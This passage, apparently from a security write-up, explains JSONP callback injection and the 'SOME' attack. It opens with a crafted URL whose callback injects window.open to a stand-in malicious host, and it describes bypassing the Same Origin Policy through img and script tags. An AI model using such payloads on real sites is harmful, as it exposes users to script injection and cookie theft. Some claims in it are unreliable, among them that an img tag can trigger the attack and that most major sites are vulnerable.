http://example.com/api/get_user.json?id=1&callback=window.open('http://malicious.site/evil.php');//

Which would return something similar to the following:
window.open('http://malicious.site/evil.php');//({"username": "admin", "email_address":"test@example.com"});

Using this example the above URL would open a window from the user’s browser and direct them to http://malicious.site/evil.php (and prevent the rest of the response from being parsed) which could infect the user’s browser with a persistent XSS malware such as BeEF or similar.

A lot of web applications contain the Same Origin Policy headers which attempts to prevent attackers from loading pages or resources from external entities. However this attack bypasses this in two ways. The first way is that JSONP or JSON with Padding is expected to be used externally as that is what it was designed to be used for and the second way is that all calls to the resource is loaded from the same origin which means that the request never gets picked up from the Same Origin Policy.

Whilst performing some testing with this vulnerability, I found that it was also possible to abuse this vulnerability remotely by bypassing the Same Origin Policy using a few tricks such as loading the affected URL directly from an <img src=""> tag or a <script> tag which do not get prevented from the Same Origin Policy. This allows an attacker to perform virtually unlimited amount of actions on the application under the context of the unsuspecting victim user. These actions could range from stealing personal images, releasing data, stealing cookies or just performing malicious acts such as infecting the user with BeEF.

During this research I found that most of the major websites, including Microsoft, Facebook, Google, etc are all vulnerable to this type of attack. The one thing they all have in common is open-source Javascript frameworks from jQuery, PrototypeJS, AngularJS and more. These Javascript frameworks appear to allow for the SOME vulnerability to be present without any way of removing the functionality (easily).

SOME Example